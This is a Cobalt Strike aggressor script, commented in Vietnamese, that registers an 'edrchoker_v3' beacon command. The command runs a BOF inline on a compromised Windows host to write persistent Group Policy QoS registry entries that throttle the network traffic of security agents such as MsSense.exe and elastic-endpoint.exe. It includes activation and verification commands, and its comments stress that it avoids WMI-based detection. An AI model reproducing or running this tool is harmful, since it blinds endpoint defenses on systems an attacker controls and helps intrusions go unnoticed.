# edrchoker_v3.cna — registry-based QoS, no WMI/COM
#
# v3 ghi thẳng vào registry (Group Policy QoS path) — không có COM, không có WMI.
# Ưu điểm: footprint thấp nhất, không trigger WMI provider events.
# Lưu ý: policy CÓ THỂ chưa active ngay — activate bằng:
#   shell gpupdate /force
#   hoặc reboot target
#   hoặc: shell net stop NetQosSvc & net start NetQosSvc
#
# Persistence: có — policy tồn tại trong registry, active lại sau mỗi lần reboot.
#
# Usage:
#   edrchoker_v3 add        "proc1.exe;proc2.exe"   ghi registry QoS entries
#   edrchoker_v3 remove     "proc1.exe;proc2.exe"   xóa policies matching
#   edrchoker_v3 remove_all                         xóa tất cả policies
#   edrchoker_v3 list                               liệt kê policies

alias edrchoker_v3 {
    local('$bof $args $bid $handle $path $cmd $procs');
    $bid = $1;
    $cmd = $2;

    if ($cmd is $null || $cmd eq "") {
        berror($bid, "[edrchoker_v3] usage: edrchoker_v3 <add|remove|remove_all|list> [procs]");
        return;
    }

    $procs = "";

    if ($cmd eq "add" || $cmd eq "remove") {
        if (size(@_) < 3 || $3 eq "") {
            berror($bid, "[edrchoker_v3] " . $cmd . " requires a process list: \"proc1.exe;proc2.exe\"");
            return;
        }
        $procs = $3;
    }

    $path   = script_resource("edrchoker_v3.x64.o");
    $handle = openf($path);
    if ($handle is $null) { berror($bid, "[edrchoker_v3] cannot open BOF: " . $path); return; }
    $bof = readb($handle, 1048576);
    closef($handle);
    if ($bof is $null) { berror($bid, "[edrchoker_v3] readb failed"); return; }

    if ($procs ne "") {
        btask($bid, "EDRChoker v3 (registry): " . $cmd . " " . $procs);
    } else {
        btask($bid, "EDRChoker v3 (registry): " . $cmd);
    }

    $args = bof_pack($bid, "zz", $cmd, $procs);
    beacon_inline_execute($bid, $bof, "go", $args);
}

beacon_command_register(
    "edrchoker_v3",
    "Throttle EDR via Group Policy QoS registry (no WMI/COM) — active after reboot/gpupdate",
    "Usage:\n" .
    "  edrchoker_v3 add        \"p1.exe;p2.exe\"   ghi registry QoS throttle\n" .
    "  edrchoker_v3 remove     \"p1.exe;p2.exe\"   xóa policies theo process\n" .
    "  edrchoker_v3 remove_all                   xóa TẤT CẢ QoS policies\n" .
    "  edrchoker_v3 list                         liệt kê active policies\n\n" .
    "So sánh với v2:\n" .
    "  v2 (WMI): immediate effect, dùng COM/WMI — có WMI provider events\n" .
    "  v3 (reg): cần reboot/gpupdate, không có COM/WMI — chỉ ADVAPI32 reg calls\n\n" .
    "Activate sau khi add:\n" .
    "  shell gpupdate /force\n" .
    "  shell net stop NetQosSvc & net start NetQosSvc\n\n" .
    "Examples:\n" .
    "  edrchoker_v3 add    \"MsSense.exe;elastic-endpoint.exe\"\n" .
    "  edrchoker_v3 remove \"MsSense.exe\"\n" .
    "  edrchoker_v3 remove_all\n" .
    "  edrchoker_v3 list\n\n" .
    "Verify:\n" .
    "  reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\QoS"
);
